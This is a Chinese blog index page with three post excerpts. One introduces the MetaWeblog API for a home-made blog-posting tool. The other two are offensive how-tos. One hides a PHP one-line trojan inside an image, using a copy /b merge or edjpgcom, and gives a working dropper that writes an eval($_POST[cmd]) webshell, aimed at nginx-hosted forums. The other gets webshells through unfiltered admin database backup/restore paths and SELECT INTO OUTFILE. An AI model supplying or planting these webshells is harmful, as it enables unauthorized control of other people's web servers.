摘要:
在网上闲逛,突然对博客的接口感兴趣,经考察,多数博客都对metaWeblog Api 提供了支持,虽然windows live writer是好用,不过出于对这个接口的好奇,也想自己做个能发博客的小工具.到处浏览资料,用了一个下午终于成功发布了一篇简陋版博客:)。其实很简单,方法对了很快就连上了。MetaWeblog API中文说明1、什么是MetaWeblog API?MetaWeblog API(MWA)是一个Blog程序接口标准,允许外部程序来获取或者设置Blog的文字和熟悉。他建立在XMLRPC接口之上,并且已经有了很多的实现。2、基本的函数规范有三个基本的函数规范:metaWeblo 阅读全文
摘要:
先合并一张PHP一句话图片马,合并方法:①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif②、用edjpgcom,进行图片和一句话木马的合并,图片随便找一张.【顺带着说一下edjpgcom的使用方法:打开edjpgcom.exe所在文件夹,然后把你所要修改的图片拖动到edjpgcom.exe上面,然后edjpgcom.exe会自动打开,写入想要些的代码即可】一句话:<?PHP fputs(fopen(’shell.php’,’w’),’<?php eval($_POST[cmd])?>’);?>然后找个nginx的站,先注册一个用户然后在论坛 阅读全文
摘要:
asp+acc/mssql程序 主要是利用后台对access数据库的“备份数据库”或“恢复数据库”功能,“备份的数据库路径”等变量没有过滤导致可以把任意文件后缀改为asp,从而得到webshell,msssql版的程序就直接应用了access版的代码,导致sql版照样可以利用。具体方法和分析可以参考angel的文章《动网论坛7.0获得WebShell的分析》。据我所知,目前还有很多的asp程序后台存在这样的漏洞,利用方法大同小异。php+mysql程序① 利用后台的数据查询功能 在有的程序后台提供直接对mysql数据查询功能,我们就可以利用它执行SELECT ... INTO OUTFIL.. 阅读全文